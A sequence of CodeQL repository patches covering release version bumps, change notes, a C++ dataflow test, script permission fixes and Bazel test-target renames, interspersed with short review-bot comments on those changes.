shared/threat-models/qlpack.yml | 2 +- shared/tutorial/qlpack.yml | 2 +- shared/typeflow/qlpack.yml | 2 +- shared/typetracking/qlpack.yml | 2 +- shared/typos/qlpack.yml | 2 +- shared/util/qlpack.yml | 2 +- shared/xml/qlpack.yml | 2 +- shared/yaml/qlpack.yml | 2 +- swift/ql/lib/qlpack.yml | 2 +- swift/ql/src/qlpack.yml | 2 +- 34 files changed, 34 insertions(+), 34 deletions(-) diff --git a/cpp/ql/lib/qlpack.yml b/cpp/ql/lib/qlpack.yml index 723a2c3544e..4bb4b04e02f 100644 --- a/cpp/ql/lib/qlpack.yml +++ b/cpp/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/cpp-all -version: 3.0.0 +version: 3.0.1-dev groups: cpp dbscheme: semmlecode.cpp.dbscheme extractor: cpp diff --git a/cpp/ql/src/qlpack.yml b/cpp/ql/src/qlpack.yml index 824ee1459aa..940c3e2a4cb 100644 --- a/cpp/ql/src/qlpack.yml +++ b/cpp/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/cpp-queries -version: 1.3.0 +version: 1.3.1-dev groups: - cpp - queries 
diff --git a/csharp/ql/campaigns/Solorigate/lib/qlpack.yml b/csharp/ql/campaigns/Solorigate/lib/qlpack.yml index daac6be2fbb..781915bf1a1 100644 --- a/csharp/ql/campaigns/Solorigate/lib/qlpack.yml +++ b/csharp/ql/campaigns/Solorigate/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/csharp-solorigate-all -version: 1.7.30 +version: 1.7.31-dev groups: - csharp - solorigate diff --git a/csharp/ql/campaigns/Solorigate/src/qlpack.yml b/csharp/ql/campaigns/Solorigate/src/qlpack.yml index 1b3b911c6f1..979d8e6c661 100644 --- a/csharp/ql/campaigns/Solorigate/src/qlpack.yml +++ b/csharp/ql/campaigns/Solorigate/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/csharp-solorigate-queries -version: 1.7.30 +version: 1.7.31-dev groups: - csharp - solorigate diff --git a/csharp/ql/lib/qlpack.yml b/csharp/ql/lib/qlpack.yml index d985d58b112..81a55470a4d 100644 --- a/csharp/ql/lib/qlpack.yml +++ b/csharp/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/csharp-all -version: 4.0.0 +version: 4.0.1-dev groups: csharp dbscheme: semmlecode.csharp.dbscheme extractor: csharp diff --git a/csharp/ql/src/qlpack.yml b/csharp/ql/src/qlpack.yml index f838d279d87..e4d9400d96d 100644 --- a/csharp/ql/src/qlpack.yml +++ b/csharp/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/csharp-queries -version: 1.0.13 +version: 1.0.14-dev groups: - csharp - queries diff --git a/go/ql/consistency-queries/qlpack.yml b/go/ql/consistency-queries/qlpack.yml index 72aeab276d7..1812705438c 100644 --- a/go/ql/consistency-queries/qlpack.yml +++ b/go/ql/consistency-queries/qlpack.yml @@ -1,5 +1,5 @@ name: codeql-go-consistency-queries -version: 1.0.13 +version: 1.0.14-dev groups: - go - queries diff --git a/go/ql/lib/qlpack.yml b/go/ql/lib/qlpack.yml index df0d0e9d5fc..4e72aa3857b 100644 --- a/go/ql/lib/qlpack.yml +++ b/go/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/go-all -version: 3.0.0 +version: 3.0.1-dev groups: go dbscheme: go.dbscheme extractor: go 
diff --git a/go/ql/src/qlpack.yml b/go/ql/src/qlpack.yml index ecd9cbb13f0..36775d0d862 100644 --- a/go/ql/src/qlpack.yml +++ b/go/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/go-queries -version: 1.1.4 +version: 1.1.5-dev groups: - go - queries diff --git a/java/ql/lib/qlpack.yml b/java/ql/lib/qlpack.yml index 54f56a24606..f892ca1c450 100644 --- a/java/ql/lib/qlpack.yml +++ b/java/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/java-all -version: 5.0.0 +version: 5.0.1-dev groups: java dbscheme: config/semmlecode.dbscheme extractor: java diff --git a/java/ql/src/qlpack.yml b/java/ql/src/qlpack.yml index eb757401a84..8ee211fb536 100644 --- a/java/ql/src/qlpack.yml +++ b/java/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/java-queries -version: 1.1.10 +version: 1.1.11-dev groups: - java - queries diff --git a/javascript/ql/lib/qlpack.yml b/javascript/ql/lib/qlpack.yml index 4245aa6e5d3..4d568ff4813 100644 --- a/javascript/ql/lib/qlpack.yml +++ b/javascript/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/javascript-all -version: 2.2.0 +version: 2.2.1-dev groups: javascript dbscheme: semmlecode.javascript.dbscheme extractor: javascript diff --git a/javascript/ql/src/qlpack.yml b/javascript/ql/src/qlpack.yml index ba7c502b29f..78f0585027b 100644 --- a/javascript/ql/src/qlpack.yml +++ b/javascript/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/javascript-queries -version: 1.2.5 +version: 1.2.6-dev groups: - javascript - queries diff --git a/misc/suite-helpers/qlpack.yml b/misc/suite-helpers/qlpack.yml index 834362022be..eeb8f762b13 100644 --- a/misc/suite-helpers/qlpack.yml +++ b/misc/suite-helpers/qlpack.yml @@ -1,4 +1,4 @@ name: codeql/suite-helpers -version: 1.0.13 +version: 1.0.14-dev groups: shared warnOnImplicitThis: true diff --git a/python/ql/lib/qlpack.yml b/python/ql/lib/qlpack.yml index 978dfd96a83..147933b96fe 100644 --- a/python/ql/lib/qlpack.yml +++ b/python/ql/lib/qlpack.yml 
@@ -1,5 +1,5 @@ name: codeql/python-all -version: 3.0.0 +version: 3.0.1-dev groups: python dbscheme: semmlecode.python.dbscheme extractor: python diff --git a/python/ql/src/qlpack.yml b/python/ql/src/qlpack.yml index bff5afdf817..d83b6433ac6 100644 --- a/python/ql/src/qlpack.yml +++ b/python/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/python-queries -version: 1.3.4 +version: 1.3.5-dev groups: - python - queries diff --git a/ruby/ql/lib/qlpack.yml b/ruby/ql/lib/qlpack.yml index 41b72629a67..ddf106c95bf 100644 --- a/ruby/ql/lib/qlpack.yml +++ b/ruby/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/ruby-all -version: 3.0.0 +version: 3.0.1-dev groups: ruby extractor: ruby dbscheme: ruby.dbscheme diff --git a/ruby/ql/src/qlpack.yml b/ruby/ql/src/qlpack.yml index 7f337d89d6a..43bfe75f566 100644 --- a/ruby/ql/src/qlpack.yml +++ b/ruby/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/ruby-queries -version: 1.1.8 +version: 1.1.9-dev groups: - ruby - queries diff --git a/shared/controlflow/qlpack.yml b/shared/controlflow/qlpack.yml index 5401179ac96..268f142bd1b 100644 --- a/shared/controlflow/qlpack.yml +++ b/shared/controlflow/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/controlflow -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true dependencies: diff --git a/shared/dataflow/qlpack.yml b/shared/dataflow/qlpack.yml index 55eb216cc54..6a8e8c3a4ae 100644 --- a/shared/dataflow/qlpack.yml +++ b/shared/dataflow/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/dataflow -version: 1.1.7 +version: 1.1.8-dev groups: shared library: true dependencies: diff --git a/shared/mad/qlpack.yml b/shared/mad/qlpack.yml index 5c37e609029..125bcad622d 100644 --- a/shared/mad/qlpack.yml +++ b/shared/mad/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/mad -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true dependencies: diff --git a/shared/rangeanalysis/qlpack.yml b/shared/rangeanalysis/qlpack.yml index bd33c35fe53..62c8c1e46b6 100644 --- a/shared/rangeanalysis/qlpack.yml 
+++ b/shared/rangeanalysis/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/rangeanalysis -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true dependencies: diff --git a/shared/regex/qlpack.yml b/shared/regex/qlpack.yml index 07d9f87eb8c..e2cda264dc8 100644 --- a/shared/regex/qlpack.yml +++ b/shared/regex/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/regex -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true dependencies: diff --git a/shared/ssa/qlpack.yml b/shared/ssa/qlpack.yml index 9a2027d0706..b146ce5bc91 100644 --- a/shared/ssa/qlpack.yml +++ b/shared/ssa/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/ssa -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true dependencies: diff --git a/shared/threat-models/qlpack.yml b/shared/threat-models/qlpack.yml index d29bd36dd83..6ec41bbcc04 100644 --- a/shared/threat-models/qlpack.yml +++ b/shared/threat-models/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/threat-models -version: 1.0.13 +version: 1.0.14-dev library: true groups: shared dataExtensions: diff --git a/shared/tutorial/qlpack.yml b/shared/tutorial/qlpack.yml index e618abb068b..6677c74eed4 100644 --- a/shared/tutorial/qlpack.yml +++ b/shared/tutorial/qlpack.yml @@ -1,7 +1,7 @@ name: codeql/tutorial description: Library for the CodeQL detective tutorials, helping new users learn to write CodeQL queries. -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true warnOnImplicitThis: true diff --git a/shared/typeflow/qlpack.yml b/shared/typeflow/qlpack.yml index e9d46c074e8..cd9e70bba8c 100644 --- a/shared/typeflow/qlpack.yml +++ b/shared/typeflow/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/typeflow -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true dependencies: diff --git a/shared/typetracking/qlpack.yml b/shared/typetracking/qlpack.yml index 9e4717670a7..fbe63f0da01 100644 --- a/shared/typetracking/qlpack.yml +++ b/shared/typetracking/qlpack.yml 
@@ -1,5 +1,5 @@ name: codeql/typetracking -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true dependencies: diff --git a/shared/typos/qlpack.yml b/shared/typos/qlpack.yml index b3ed91c0926..250f729ab5f 100644 --- a/shared/typos/qlpack.yml +++ b/shared/typos/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/typos -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true warnOnImplicitThis: true diff --git a/shared/util/qlpack.yml b/shared/util/qlpack.yml index 4b66bd8ad92..b327c25a3d9 100644 --- a/shared/util/qlpack.yml +++ b/shared/util/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/util -version: 2.0.0 +version: 2.0.1-dev groups: shared library: true dependencies: null diff --git a/shared/xml/qlpack.yml b/shared/xml/qlpack.yml index 8d8b1b8ee54..76c408c2920 100644 --- a/shared/xml/qlpack.yml +++ b/shared/xml/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/xml -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true dependencies: diff --git a/shared/yaml/qlpack.yml b/shared/yaml/qlpack.yml index 998a94f4bbf..0c756e1edbb 100644 --- a/shared/yaml/qlpack.yml +++ b/shared/yaml/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/yaml -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true warnOnImplicitThis: true diff --git a/swift/ql/lib/qlpack.yml b/swift/ql/lib/qlpack.yml index 66fd8af358e..7752975faea 100644 --- a/swift/ql/lib/qlpack.yml +++ b/swift/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/swift-all -version: 3.0.0 +version: 3.0.1-dev groups: swift extractor: swift dbscheme: swift.dbscheme diff --git a/swift/ql/src/qlpack.yml b/swift/ql/src/qlpack.yml index ee53e55fe41..ec8e2cb9932 100644 --- a/swift/ql/src/qlpack.yml +++ b/swift/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/swift-queries -version: 1.0.13 +version: 1.0.14-dev groups: - swift - queries From 214da9e9adf74cb7fc17b73b74653a95f2e7582e Mon Sep 17 00:00:00 2001 
From: Jami Cogswell Date: Fri, 6 Dec 2024 19:59:40 -0500 Subject: [PATCH 0914/1267] Java: add change note --- java/ql/lib/change-notes/2024-12-06-file-getname.md | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 java/ql/lib/change-notes/2024-12-06-file-getname.md diff --git a/java/ql/lib/change-notes/2024-12-06-file-getname.md b/java/ql/lib/change-notes/2024-12-06-file-getname.md new file mode 100644 index 00000000000..b2d1d271ab5 --- /dev/null +++ b/java/ql/lib/change-notes/2024-12-06-file-getname.md @@ -0,0 +1,4 @@ +--- +category: minorAnalysis +--- +* Added `java.io.File.getName()` as a path injection sanitizer. From 41425b157f0e2b0176eafedf516a594eae7bbc5f Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Sun, 8 Dec 2024 23:47:34 +0000 Subject: [PATCH 0915/1267] C++: Add test with missing flow. --- .../dataflow/dataflow-tests/dataflow-consistency.expected | 4 ++++ .../dataflow/dataflow-tests/test-source-sink.expected | 2 ++ cpp/ql/test/library-tests/dataflow/dataflow-tests/test.cpp | 7 +++++++ .../dataflow/dataflow-tests/uninitialized.expected | 3 +++ 4 files changed, 16 insertions(+) diff --git a/cpp/ql/test/library-tests/dataflow/dataflow-tests/dataflow-consistency.expected b/cpp/ql/test/library-tests/dataflow/dataflow-tests/dataflow-consistency.expected index 68dad62a95f..ca62e5c9269 100644 --- a/cpp/ql/test/library-tests/dataflow/dataflow-tests/dataflow-consistency.expected +++ b/cpp/ql/test/library-tests/dataflow/dataflow-tests/dataflow-consistency.expected 
@@ -181,6 +181,10 @@ postWithInFlow | test.cpp:1108:4:1108:4 | p [inner post update] | PostUpdateNode should not be the target of local flow. | | test.cpp:1109:3:1109:4 | * ... [post update] | PostUpdateNode should not be the target of local flow. | | test.cpp:1109:4:1109:4 | p [inner post update] | PostUpdateNode should not be the target of local flow. | +| test.cpp:1138:3:1138:13 | * ... [post update] | PostUpdateNode should not be the target of local flow. | +| test.cpp:1138:5:1138:8 | data [inner post update] | PostUpdateNode should not be the target of local flow. | +| test.cpp:1139:3:1139:7 | * ... [post update] | PostUpdateNode should not be the target of local flow. | +| test.cpp:1139:4:1139:7 | data [inner post update] | PostUpdateNode should not be the target of local flow. | viableImplInCallContextTooLarge uniqueParameterNodeAtPosition uniqueParameterNodePosition diff --git a/cpp/ql/test/library-tests/dataflow/dataflow-tests/test-source-sink.expected b/cpp/ql/test/library-tests/dataflow/dataflow-tests/test-source-sink.expected index 10a8bef9a33..6a65ddf952c 100644 --- a/cpp/ql/test/library-tests/dataflow/dataflow-tests/test-source-sink.expected +++ b/cpp/ql/test/library-tests/dataflow/dataflow-tests/test-source-sink.expected @@ -132,6 +132,8 @@ astFlow | test.cpp:1069:9:1069:14 | call to source | test.cpp:1074:10:1074:10 | i | | test.cpp:1069:9:1069:14 | call to source | test.cpp:1082:10:1082:10 | i | | test.cpp:1086:12:1086:12 | a | test.cpp:1088:8:1088:9 | & ... | +| test.cpp:1137:7:1137:10 | data | test.cpp:1140:8:1140:18 | * ... | +| test.cpp:1138:17:1138:22 | call to source | test.cpp:1140:8:1140:18 | * ... | | true_upon_entry.cpp:17:11:17:16 | call to source | true_upon_entry.cpp:21:8:21:8 | x | | true_upon_entry.cpp:27:9:27:14 | call to source | true_upon_entry.cpp:29:8:29:8 | x | | true_upon_entry.cpp:33:11:33:16 | call to source | true_upon_entry.cpp:39:8:39:8 | x | 
diff --git a/cpp/ql/test/library-tests/dataflow/dataflow-tests/test.cpp b/cpp/ql/test/library-tests/dataflow/dataflow-tests/test.cpp index 60baa08bb8d..33c714a3139 100644 --- a/cpp/ql/test/library-tests/dataflow/dataflow-tests/test.cpp +++ b/cpp/ql/test/library-tests/dataflow/dataflow-tests/test.cpp @@ -1131,4 +1131,11 @@ void (*dispatch_table[])(int) = { void test_dispatch_table(int i) { int x = source(); dispatch_table[i](x); +} + +void test_uncertain_array(int n1, int n2) { + int data[10]; + *(data + 1) = source(); + *data = 0; + sink(*(data + 1)); // $ ast=1138:17 ast=1137:7 MISSING: ir } \ No newline at end of file diff --git a/cpp/ql/test/library-tests/dataflow/dataflow-tests/uninitialized.expected b/cpp/ql/test/library-tests/dataflow/dataflow-tests/uninitialized.expected index 16f0b799d0a..52bbcabb1e3 100644 --- a/cpp/ql/test/library-tests/dataflow/dataflow-tests/uninitialized.expected +++ b/cpp/ql/test/library-tests/dataflow/dataflow-tests/uninitialized.expected @@ -56,3 +56,6 @@ | test.cpp:796:12:796:12 | a | test.cpp:798:17:798:17 | a | | test.cpp:1086:12:1086:12 | a | test.cpp:1087:3:1087:3 | a | | test.cpp:1086:12:1086:12 | a | test.cpp:1088:9:1088:9 | a | +| test.cpp:1137:7:1137:10 | data | test.cpp:1138:5:1138:8 | data | +| test.cpp:1137:7:1137:10 | data | test.cpp:1139:4:1139:7 | data | +| test.cpp:1137:7:1137:10 | data | test.cpp:1140:10:1140:13 | data | From f74dcc703657a4521a67a57351c48f03090f2e5e Mon Sep 17 00:00:00 2001 
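Review bot: `test_uncertain_array` takes `n1` and `n2` but never uses them, and both writes use constant offsets, so nothing in the body shows which access is meant to be uncertain. Either drop the parameters or index with them, and add a comment above the `sink` line stating why flow is expected, for example `// the write to *data must not kill the earlier write to data[1]`. That keeps the `MISSING: ir` annotation readable as a known false negative of the IR data flow rather than an accepted outcome. The file also still ends without a trailing newline.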
From: Paolo Tranquilli Date: Mon, 9 Dec 2024 10:20:46 +0100 Subject: [PATCH 0916/1267] Make scripts executable --- misc/scripts/check-query-ids.py | 2 ++ misc/scripts/create-change-note.py | 0 misc/scripts/generate-code-scanning-query-list.py | 4 +++- misc/scripts/models-as-data/generate_flow_model.py | 4 ++-- misc/scripts/pre-commit | 0 misc/scripts/shared-code-metrics.py | 10 +++++----- 6 files changed, 12 insertions(+), 8 deletions(-) mode change 100644 => 100755 misc/scripts/check-query-ids.py mode change 100644 => 100755 misc/scripts/create-change-note.py mode change 100644 => 100755 misc/scripts/generate-code-scanning-query-list.py mode change 100644 => 100755 misc/scripts/models-as-data/generate_flow_model.py mode change 100644 => 100755 misc/scripts/pre-commit mode change 100644 => 100755 misc/scripts/shared-code-metrics.py diff --git a/misc/scripts/check-query-ids.py b/misc/scripts/check-query-ids.py old mode 100644 new mode 100755 index aa06ae3a6a5..4158b992ec7 --- a/misc/scripts/check-query-ids.py +++ b/misc/scripts/check-query-ids.py @@ -1,3 +1,5 @@ +#!/usr/bin/env python3 + from pathlib import Path import re import sys diff --git a/misc/scripts/create-change-note.py b/misc/scripts/create-change-note.py old mode 100644 new mode 100755 diff --git a/misc/scripts/generate-code-scanning-query-list.py b/misc/scripts/generate-code-scanning-query-list.py old mode 100644 new mode 100755 index 94b15a33886..72a5d7732d0 --- a/misc/scripts/generate-code-scanning-query-list.py +++ b/misc/scripts/generate-code-scanning-query-list.py @@ -1,3 +1,5 @@ +#!/usr/bin/env python3 + import subprocess import json import csv @@ -52,7 +54,7 @@ class CodeQL: except: self.proc.kill() - def command(self, args): + def command(self, args): data = json.dumps(args) data_bytes = data.encode('utf-8') self.proc.stdin.write(data_bytes) 
diff --git a/misc/scripts/models-as-data/generate_flow_model.py b/misc/scripts/models-as-data/generate_flow_model.py old mode 100644 new mode 100755 index cfd524066cb..17db03e01e4 --- a/misc/scripts/models-as-data/generate_flow_model.py +++ b/misc/scripts/models-as-data/generate_flow_model.py @@ -140,7 +140,7 @@ Requirements: `codeql` should both appear on your path. generator.setenvironment(sys.argv[1], sys.argv[2]) return generator - + def runQuery(self, query): print("########## Querying " + query + "...") @@ -224,7 +224,7 @@ extensions: if self.dryRun: print("Models as data extensions generated, but not written to file.") sys.exit(0) - + if (self.generateSinks or self.generateSources or self.generateSummaries or diff --git a/misc/scripts/pre-commit b/misc/scripts/pre-commit old mode 100644 new mode 100755 diff --git a/misc/scripts/shared-code-metrics.py b/misc/scripts/shared-code-metrics.py old mode 100644 new mode 100755 index bfc613e5c87..23ce1fd8759 --- a/misc/scripts/shared-code-metrics.py +++ b/misc/scripts/shared-code-metrics.py @@ -1,7 +1,7 @@ #!/bin/env python3 # Generates a report on the amount of code sharing in this repo # -# The purpose of this is +# The purpose of this is # a) To be able to understand the structure and dependencies # b) To provide a metric that measures the amount of shared vs non-shared code @@ -224,7 +224,7 @@ for qlfile in ql_file_index.values(): if lang in language_info: info = language_info[lang] if qlfile.isOnlyInLanguage(lang): - info.addQlFile(qlfile) + info.addQlFile(qlfile) # Determine all package dependencies 
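Review bot: `shared-code-metrics.py` is switched to mode 100755 but keeps its `#!/bin/env python3` first line, shown as context in its first hunk, while the other scripts touched by this commit get `#!/usr/bin/env python3`. `/bin/env` is absent on some systems, so running the script directly can fail there; change the line to `#!/usr/bin/env python3` to match. `generate_flow_model.py`, `create-change-note.py` and `pre-commit` also become executable with no interpreter line visible in these hunks, so it is worth confirming that each one starts with a shebang.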
@@ -276,15 +276,15 @@ def print_package_dependencies(packages): nlines = package.lines + package.total_imported_lines shared_percentage = 100 * package.total_imported_lines / nlines if nlines>0 else 0 print('|', package.link(), '|', package.files, '|', package.lines, '|', package.total_imported_files, '|', package.total_imported_lines, '|', - # ','.join([p.name for p in package.all_dependencies]), + # ','.join([p.name for p in package.all_dependencies]), "%.2f" % shared_percentage, '|') print() def print_language_dependencies(packages): - print_package_dependencies([p for p in packages if p.name.endswith('-all') and p.name.count('-')==1]) + print_package_dependencies([p for p in packages if p.name.endswith('-all') and p.name.count('-')==1]) def list_shared_code_by_language(language_info): - # For each language directory, list the files that are (1) inside the directory and not shared, + # For each language directory, list the files that are (1) inside the directory and not shared, # (2) packages from outside the directory, plus identical files print('| Language | Non-shared files | Non-shared lines of code | Imported files | Imported lines of code | Shared code % |') print('| -------- | ---------------- | ------------------------ | -------------- | ---------------------- | ------------- |') From 3bc822f02120b2a41e231dd489544009fabd4bcb Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Mon, 9 Dec 2024 10:31:15 +0100 Subject: [PATCH 0917/1267] Swift: add change note for Swift 6 upgrade --- swift/ql/lib/change-notes/2024-12-09-swift-6.md | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 swift/ql/lib/change-notes/2024-12-09-swift-6.md diff --git a/swift/ql/lib/change-notes/2024-12-09-swift-6.md b/swift/ql/lib/change-notes/2024-12-09-swift-6.md new file mode 100644 index 00000000000..e32344b28d8 --- /dev/null +++ b/swift/ql/lib/change-notes/2024-12-09-swift-6.md 
@@ -0,0 +1,4 @@ +--- +category: majorAnalysis +--- +* Upgraded to allow analysis of Swift 6.0.2. From 18560cde9d492da9e4cca5f04723c9931bcaafe8 Mon Sep 17 00:00:00 2001 From: Cornelius Riemenschneider Date: Sun, 8 Dec 2024 12:51:40 +0100 Subject: [PATCH 0918/1267] C#: Shorten test target names to make Windows happy. --- csharp/BUILD.bazel | 6 +++--- .../autobuilder/Semmle.Autobuild.CSharp.Tests/BUILD.bazel | 3 ++- csharp/autobuilder/Semmle.Autobuild.Cpp.Tests/BUILD.bazel | 3 ++- .../Semmle.Extraction.CSharp.DependencyFetching/BUILD.bazel | 2 +- .../Semmle.Extraction.CSharp.StubGenerator/BUILD.bazel | 2 +- csharp/extractor/Semmle.Extraction.Tests/BUILD.bazel | 3 ++- 6 files changed, 11 insertions(+), 8 deletions(-) diff --git a/csharp/BUILD.bazel b/csharp/BUILD.bazel index fbe4213ab9e..4c816766017 100644 --- a/csharp/BUILD.bazel +++ b/csharp/BUILD.bazel @@ -74,8 +74,8 @@ test_suite( name = "unit-tests", tags = ["csharp"], tests = [ - "//csharp/autobuilder/Semmle.Autobuild.CSharp.Tests", - "//csharp/autobuilder/Semmle.Autobuild.Cpp.Tests", - "//csharp/extractor/Semmle.Extraction.Tests", + "//csharp/autobuilder/Semmle.Autobuild.CSharp.Tests:t", + "//csharp/autobuilder/Semmle.Autobuild.Cpp.Tests:t", + "//csharp/extractor/Semmle.Extraction.Tests:t", ], ) diff --git a/csharp/autobuilder/Semmle.Autobuild.CSharp.Tests/BUILD.bazel b/csharp/autobuilder/Semmle.Autobuild.CSharp.Tests/BUILD.bazel index 65371c89393..49a26bdb33b 100644 --- a/csharp/autobuilder/Semmle.Autobuild.CSharp.Tests/BUILD.bazel +++ b/csharp/autobuilder/Semmle.Autobuild.CSharp.Tests/BUILD.bazel @@ -4,7 +4,8 @@ load( ) codeql_xunit_test( - name = "Semmle.Autobuild.CSharp.Tests", + # short name as we run into long path limitations on Windows + name = "t", srcs = glob([ "*.cs", ]), diff --git a/csharp/autobuilder/Semmle.Autobuild.Cpp.Tests/BUILD.bazel b/csharp/autobuilder/Semmle.Autobuild.Cpp.Tests/BUILD.bazel index 10c8c6dc96c..1cf2480403a 100644 --- a/csharp/autobuilder/Semmle.Autobuild.Cpp.Tests/BUILD.bazel 
+++ b/csharp/autobuilder/Semmle.Autobuild.Cpp.Tests/BUILD.bazel @@ -4,7 +4,8 @@ load( ) codeql_xunit_test( - name = "Semmle.Autobuild.Cpp.Tests", + # short name as we run into long path limitations on Windows + name = "t", srcs = glob([ "*.cs", ]), diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/BUILD.bazel b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/BUILD.bazel index 8be8aaa8408..5a4d49c88fd 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/BUILD.bazel +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/BUILD.bazel @@ -10,7 +10,7 @@ codeql_csharp_library( "SourceGenerators/**/*.cs", ]), allow_unsafe_blocks = True, - internals_visible_to = ["Semmle.Extraction.Tests"], + internals_visible_to = ["t"], visibility = ["//csharp:__subpackages__"], deps = [ "//csharp/extractor/Semmle.Extraction.CSharp", diff --git a/csharp/extractor/Semmle.Extraction.CSharp.StubGenerator/BUILD.bazel b/csharp/extractor/Semmle.Extraction.CSharp.StubGenerator/BUILD.bazel index 563168cdf48..e3d0533a776 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.StubGenerator/BUILD.bazel +++ b/csharp/extractor/Semmle.Extraction.CSharp.StubGenerator/BUILD.bazel @@ -8,7 +8,7 @@ codeql_csharp_library( srcs = glob([ "*.cs", ]), - internals_visible_to = ["Semmle.Extraction.Tests"], + internals_visible_to = ["t"], visibility = ["//csharp:__subpackages__"], deps = [ "//csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching", diff --git a/csharp/extractor/Semmle.Extraction.Tests/BUILD.bazel b/csharp/extractor/Semmle.Extraction.Tests/BUILD.bazel index df9799d3f95..4671fa33bb3 100644 --- a/csharp/extractor/Semmle.Extraction.Tests/BUILD.bazel +++ b/csharp/extractor/Semmle.Extraction.Tests/BUILD.bazel @@ -4,7 +4,8 @@ load( ) codeql_xunit_test( - name = "Semmle.Extraction.Tests", + # short name as we run into long path limitations on Windows + name = "t", srcs = glob([ "*.cs", ]), 
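Review bot: All three xunit targets are now named `t`, so `internals_visible_to = ["t"]` in the DependencyFetching and StubGenerator libraries no longer identifies a single test assembly. If the assembly name follows the target name, as the `internals_visible_to` edit suggests, internals are exposed to every assembly called `t`, and the three test outputs become hard to tell apart in logs. A distinct short name per test package would keep the path saving while leaving the friend declaration specific to the Semmle.Extraction.Tests target.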
From 526dbe5901db34cadf27f01b70121e66cc96bce1 Mon Sep 17 00:00:00 2001 From: Cornelius Riemenschneider Date: Mon, 9 Dec 2024 12:19:01 +0100 Subject: [PATCH 0919/1267] Address review, also run semmle-util tests. --- csharp/BUILD.bazel | 7 ++++--- .../autobuilder/Semmle.Autobuild.CSharp.Tests/BUILD.bazel | 2 +- csharp/autobuilder/Semmle.Autobuild.Cpp.Tests/BUILD.bazel | 2 +- .../BUILD.bazel | 2 +- .../Semmle.Extraction.CSharp.StubGenerator/BUILD.bazel | 2 +- csharp/extractor/Semmle.Extraction.Tests/BUILD.bazel | 2 +- csharp/extractor/Semmle.Util.Tests/BUILD.bazel | 3 ++- 7 files changed, 11 insertions(+), 9 deletions(-) diff --git a/csharp/BUILD.bazel b/csharp/BUILD.bazel index 4c816766017..8aaa0d492ef 100644 --- a/csharp/BUILD.bazel +++ b/csharp/BUILD.bazel @@ -74,8 +74,9 @@ test_suite( name = "unit-tests", tags = ["csharp"], tests = [ - "//csharp/autobuilder/Semmle.Autobuild.CSharp.Tests:t", - "//csharp/autobuilder/Semmle.Autobuild.Cpp.Tests:t", - "//csharp/extractor/Semmle.Extraction.Tests:t", + "//csharp/autobuilder/Semmle.Autobuild.CSharp.Tests:acst", + "//csharp/autobuilder/Semmle.Autobuild.Cpp.Tests:acpt", + "//csharp/extractor/Semmle.Extraction.Tests:et", + "//csharp/extractor/Semmle.Util.Tests:ut", ], ) diff --git a/csharp/autobuilder/Semmle.Autobuild.CSharp.Tests/BUILD.bazel b/csharp/autobuilder/Semmle.Autobuild.CSharp.Tests/BUILD.bazel index 49a26bdb33b..67f3470712d 100644 --- a/csharp/autobuilder/Semmle.Autobuild.CSharp.Tests/BUILD.bazel +++ b/csharp/autobuilder/Semmle.Autobuild.CSharp.Tests/BUILD.bazel @@ -5,7 +5,7 @@ load( codeql_xunit_test( # short name as we run into long path limitations on Windows - name = "t", + name = "acst", srcs = glob([ "*.cs", ]), diff --git a/csharp/autobuilder/Semmle.Autobuild.Cpp.Tests/BUILD.bazel b/csharp/autobuilder/Semmle.Autobuild.Cpp.Tests/BUILD.bazel index 1cf2480403a..ad8f6e3d1f1 100644 --- a/csharp/autobuilder/Semmle.Autobuild.Cpp.Tests/BUILD.bazel +++ b/csharp/autobuilder/Semmle.Autobuild.Cpp.Tests/BUILD.bazel 
